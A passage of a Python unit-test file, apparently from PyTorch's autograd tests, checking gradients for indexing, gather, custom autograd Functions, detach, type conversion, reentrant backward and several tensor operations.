self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False passed below, but gradcheck checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_trapz(self):
f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True),
torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_trapz", "trapz",
lambda y, x: torch.trapz(y, x),
True, f_args_variable, f_args_tensor)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
